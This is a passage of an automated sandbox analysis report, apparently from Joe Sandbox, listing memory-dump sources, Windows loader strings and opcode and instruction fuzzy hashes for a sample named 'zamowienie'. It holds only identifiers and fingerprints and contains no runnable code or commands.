                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                              • Opcode ID: 147fd79a2b6e347906e16ebbd07cb042369bd80e79318f4d24bc68834ce6fa6e
                                                                                                                                              • Instruction ID: 03fe178316d36a8a0967401d22a4980e9b235aeb329eec819e7b04d464ae8c3f
                                                                                                                                              • Opcode Fuzzy Hash: 147fd79a2b6e347906e16ebbd07cb042369bd80e79318f4d24bc68834ce6fa6e
                                                                                                                                              • Instruction Fuzzy Hash: 0931F576A10200AFF7109B99CA44F6A7BB8EB40355F0C0919E500BB190D770EE838B98
                                                                                                                                              Strings
                                                                                                                                              • @, xrefs: 34F312A5
                                                                                                                                              • BuildLabEx, xrefs: 34F3130F
                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 34F3127B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction ID: d9fd8be4a13b981a916a1932fe7d04fb9b43ecaa620437042ca8d933127b6b27
                                                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                              • Instruction Fuzzy Hash: 1E31B372901619EFEB11DF95CD40EEEBBBDEB84754F084825E514A71A0DB34DA068BA0
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: RtlValidateHeap
                                                                                                                                              • API String ID: 3446177414-1797218451
                                                                                                                                              • Opcode ID: 02a54c2eb20232b5cc964275dadce0073ccc33645cb5ebba46bb1bc06af4d8f1
                                                                                                                                              • Instruction ID: e2f665e299e13be0e755a76fd79e96ebd36500d516f4b65f68b56a640ef8a38a
                                                                                                                                              • Opcode Fuzzy Hash: 02a54c2eb20232b5cc964275dadce0073ccc33645cb5ebba46bb1bc06af4d8f1
                                                                                                                                              • Instruction Fuzzy Hash: 4141D276E01346DFEB01CFA4C4907ADBBB2FF41250F088A59D8615B380CB349A46EB90
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: kLsE
                                                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                                                              • Opcode ID: 9cbed10cad610ecdb830cdda829c89f69a9105f66d5e5a306eb9b04397491973
                                                                                                                                              • Instruction ID: 8f1428bf0e32c37c6255d2467907283577aa9a87425d45adcbf5044a68321145
                                                                                                                                              • Opcode Fuzzy Hash: 9cbed10cad610ecdb830cdda829c89f69a9105f66d5e5a306eb9b04397491973
                                                                                                                                              • Instruction Fuzzy Hash: 4C414771531348DBF7219B60E884BA93BD0EB40769F9C092DED90AA0E1C77554C3CBE9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$@
                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                              • Opcode ID: c20a160fb811fc085a8a3aa33edd12e892d90e8a13739ac8cb9ce11d9d94f9e4
                                                                                                                                              • Instruction ID: 5a4c16d698d8390309d1f517fc62de5d6fd64202713a52661e7b60c97286a67f
                                                                                                                                              • Opcode Fuzzy Hash: c20a160fb811fc085a8a3aa33edd12e892d90e8a13739ac8cb9ce11d9d94f9e4
                                                                                                                                              • Instruction Fuzzy Hash: DB329CB96083118BE764CF14C49073EB7E5AFC4784F589D1EE8958B2A0E7B4C846EF52
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 2888ad686ac1ecceba85e078071501d09d0207877ba2d6cdc97317a1b8222d1f
                                                                                                                                              • Instruction ID: 43eb95224481b9b4be4a5aa1a3c6c4ad578b1fb61a20f06feabedfc99d9157dc
                                                                                                                                              • Opcode Fuzzy Hash: 2888ad686ac1ecceba85e078071501d09d0207877ba2d6cdc97317a1b8222d1f
                                                                                                                                              • Instruction Fuzzy Hash: 3331CE35301B06EFE7818F60CD80E89B7A9FF54354F095465E81087AA1DB71E822DBD0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @$TargetPath
                                                                                                                                              • API String ID: 0-4164548946
                                                                                                                                              • Opcode ID: 7961eaa37c24502d2389c4c44ac49ea5128d350a27ffa3c442650a7671685a66
                                                                                                                                              • Instruction ID: 9aa0ddc5f303b8a302fcd74bf7e4caaa8ff346174b65edbc91ab728d04b48413
                                                                                                                                              • Opcode Fuzzy Hash: 7961eaa37c24502d2389c4c44ac49ea5128d350a27ffa3c442650a7671685a66
                                                                                                                                              • Instruction Fuzzy Hash: 4081C17A9083159FE710CF14C884A6BB7A8FF84758F898D2DE9469B210D738DC57CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: \REGISTRY\USER\$\Software\Microsoft\Windows
                                                                                                                                              • API String ID: 0-4122831824
                                                                                                                                              • Opcode ID: a91993be189c2a3845da8eba1fe99c1507c2ef5546c7af277b3a05bc675f8cea
                                                                                                                                              • Instruction ID: 81968c8330856b1ca2e9c17eaf5a229569e7f7a9b1b8afdaf7346aa4ac94da1c
                                                                                                                                              • Opcode Fuzzy Hash: a91993be189c2a3845da8eba1fe99c1507c2ef5546c7af277b3a05bc675f8cea
                                                                                                                                              • Instruction Fuzzy Hash: 4991A1755147059FD310CF24C880BABBBE4EF897A8F184E1EE595C7290EB38D946CB92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Log$RXACT
                                                                                                                                              • API String ID: 0-2401810139
                                                                                                                                              • Opcode ID: c84b527c7733d3ba0aa106032a12733184b24f86d29a897a925ebb481de10192
                                                                                                                                              • Instruction ID: 3bed4b12fa01e2385180f733d2b5948bba49c116a5cc3cbe3eef44cfd5e46e7d
                                                                                                                                              • Opcode Fuzzy Hash: c84b527c7733d3ba0aa106032a12733184b24f86d29a897a925ebb481de10192
                                                                                                                                              • Instruction Fuzzy Hash: 56713872109349EFE712CF54C880E6BBBECFB88654F484D2EF5849A260D775DD068B92
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID: $$$
                                                                                                                                              • API String ID: 3446177414-233714265
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                              • API String ID: 0-118005554
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: .Local\$@
                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                              Strings
                                                                                                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 34F62A95
                                                                                                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 34F62A90
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                              • API String ID: 0-2653619699
                                                                                                                                              APIs
                                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 34FC3356
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4062629308-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: W
                                                                                                                                              • API String ID: 0-655174618
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CWDIllegalInDLLSearch
                                                                                                                                              • API String ID: 0-473384322
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                              • Opcode ID: 1d4e4430e80ad8e2c819475597d310cb5035fc174ab52830271699c25b6bbdbd
                                                                                                                                              • Instruction ID: b57c895f6b2478c3115fbe6d03b77666402ef2844c6bdf247aad798e09d0d3d5
                                                                                                                                              • Opcode Fuzzy Hash: 1d4e4430e80ad8e2c819475597d310cb5035fc174ab52830271699c25b6bbdbd
                                                                                                                                              • Instruction Fuzzy Hash: 5F41D47A91031AEFDB11CB94C850AEEB7B9EF44750F09496AEA01E7250D630DE42CBA0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: verifier.dll
                                                                                                                                              • API String ID: 0-3265496382
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpInitializeProcess
                                                                                                                                              • API String ID: 0-2689506271
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Flst
                                                                                                                                              • API String ID: 0-2374792617
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Pl4
                                                                                                                                              • API String ID: 0-3511680795
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx
                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                              Strings
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrCreateEnclave
                                                                                                                                              • API String ID: 0-3262589265
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                              • Instruction ID: 39c5bc604b20599d31350abe0ddb7b6abd1862ec46d0cebd8abc9b2c877ae88e
                                                                                                                                              • Opcode Fuzzy Hash: 421d61e5bc4c825cfb3b344d513b1230fd482de7481e25e13c6dc44851e8f620
                                                                                                                                              • Instruction Fuzzy Hash: 6251D7BA600306DFDB009F648C40A6B77E5EF94698F484C2DF946E7250EB39C857C7A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e4a89579c00e5ffc7bfecc7b54ad14c10cb08822e74392e27f288a7f29d64833
                                                                                                                                              • Instruction ID: e8077b22247beffee6f5c833df953b9ff2d7227332cebacd5dda6f61b4562e2e
                                                                                                                                              • Opcode Fuzzy Hash: e4a89579c00e5ffc7bfecc7b54ad14c10cb08822e74392e27f288a7f29d64833
                                                                                                                                              • Instruction Fuzzy Hash: 9951B0B1510351DFE320DF68C981F5A77E8EF84765F180A2DE91297291DB38E843CBA6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1cc384080d82ee5abc775179eb32c906ee8392a9f7e450dc37cb9fd67d33b322
                                                                                                                                              • Instruction ID: dc35b6761220506b6280b6b3209faf154ae3160a8c59f94d74e8067b130771cd
                                                                                                                                              • Opcode Fuzzy Hash: 1cc384080d82ee5abc775179eb32c906ee8392a9f7e450dc37cb9fd67d33b322
                                                                                                                                              • Instruction Fuzzy Hash: A7413675201A00DFE716CF55D881B3677A9EF40764F59882AE559DB250EB70DC828FA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
